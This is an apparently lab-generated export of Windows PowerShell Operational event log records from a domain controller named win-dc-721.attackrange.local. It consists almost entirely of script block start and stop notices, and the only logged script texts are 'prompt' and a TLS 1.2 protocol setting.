Message=Started invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478310
Keywords=None
Message=Completed invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478309
Keywords=None
Message=Started invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478308
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478307
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478306
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478305
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1874a77a-91d5-41ae-b7a0-7444da113eed
Runspace ID: 6d4e8167-00e7-4c12-b02b-7bfd394b2dd1
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478304
Keywords=None
Message=Completed invocation of ScriptBlock ID: dd2a47ed-e90f-4a16-b784-ca6492825d96
Runspace ID: 6d4e8167-00e7-4c12-b02b-7bfd394b2dd1
06/15/2021 05:06:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478480
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478479
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2fedd906-3122-43c6-adf6-6fc20308b73a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478478
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478477
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478476
Keywords=None
Message=Started invocation of ScriptBlock ID: 2fedd906-3122-43c6-adf6-6fc20308b73a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478475
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 2fedd906-3122-43c6-adf6-6fc20308b73a
Path:
06/15/2021 05:06:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478474
Keywords=None
Message=Completed invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478473
Keywords=None
Message=Started invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478472
Keywords=None
Message=Completed invocation of ScriptBlock ID: b80cfc3d-ecfd-4a2f-8cc3-78ef6cff7cce
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478471
Keywords=None
Message=Started invocation of ScriptBlock ID: b80cfc3d-ecfd-4a2f-8cc3-78ef6cff7cce
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478470
Keywords=None
Message=Creating Scriptblock text (1 of 1):
    [Net.ServicePointManager]::SecurityProtocol = 
            [Net.SecurityProtocolType]::Tls12

ScriptBlock ID: b80cfc3d-ecfd-4a2f-8cc3-78ef6cff7cce
Path:
06/15/2021 05:06:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478469
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478592
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478591
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478590
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478589
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478588
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478587
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478586
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478585
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478584
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478583
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478582
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478581
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478580
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478579
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478578
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478577
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478576
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478575
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478574
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478573
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478572
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478571
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478570
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478569
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478568
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478567
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478566
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478565
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478564
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478563
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478562
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478561
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478560
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478559
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478558
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478557
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
